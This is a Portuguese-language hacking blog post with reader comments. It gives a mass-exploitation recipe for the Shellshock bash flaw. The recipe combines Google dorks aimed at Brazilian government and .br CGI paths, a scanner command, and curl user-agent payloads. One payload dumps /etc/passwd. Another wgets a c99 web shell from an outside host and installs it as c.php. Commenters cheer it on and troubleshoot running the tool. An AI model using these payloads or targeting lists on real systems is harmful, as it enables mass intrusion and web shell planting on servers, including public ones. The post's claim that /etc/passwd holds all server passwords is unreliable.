Eae cybers vândalos, a galera que trabalha na área de tecnologia com certeza já ouviu falar na nova vulnerabilidade que saiu "Shellshock". para mais informações sobre a falha clique no link.
Vamos para o que importa, nossa equipe montou uma linha de comando para ser usando com nosso scanner ( SCANNER INURL BR ) para explorar essa vulnerabilidade em massa.
[ Dorks ]
DORK[0]=> site:gov.br inurl:/cgi-sys/
DORK[1]=> site:.br inurl:/cgi-sys/
Lista de dorks CGI ( Créditos pela lista "Takedown" )
http://pastebin.com/7aD2uZR3
[ 0xComando ]
php inurlbrazil.php --dork 'inurl:/cgi-sys/
Explicação do comando:
"--comand-all 'curl -A "() { :;}; /bin/cat /etc/passwd > ~/cgi-sys/inurlbr.txt" http://_TARGET_/cgi-sys/
No parâmetro --comand-all ele define o exploit que vai ser usado nas url que o scanner listo, que executa o comando "cat /etc/passwd" que vai jogar todas as senhas do servidor no arquivo "~/cgi-sys/inurlbr.txt" depois ele executa o curl "curl http://_TARGET_/cgi-sys/
[ Variação de comando ]
curl -A "() { :; }; wget http://site/c99.txt;mv c99.txt c.php" http://_TARGET_/cgi-sys/defaultwebpage.cgi
Você pode variar o comando do exploit para se adaptar a sua vontade ou exploração.
Demo:
Testado!
ResponderExcluirO site de você com esse auto click do facebook está sendo bloqueado pelo anti-virus, fica o aviso, jaja o google bane o domínio também! JS antigo só fode a página
ResponderExcluiramigo poderia nos enviar o print, pois deve ser coisa desse tema novo,
ExcluirEsta é uma breve descrição no blog sobre o autor. Editá-lo, No html e procurar esse texto
ResponderExcluirMano não quer pega no meu Backtrack 5 quando eu coloco os comandos aparece esse erro
ResponderExcluirPHP Parse error: syntax error, unexpected '[' in /root/Desktop/inurlbr.php on line 55
Atualize seu PHP para PHP 5.4
ExcluirOnde consigo o script?
ResponderExcluirhttps://github.com/googleinurl
ExcluirTa chamando atenção guarulhos, parabéns neguinho, conhecimento tem que ser compartilhado mesmo
ResponderExcluir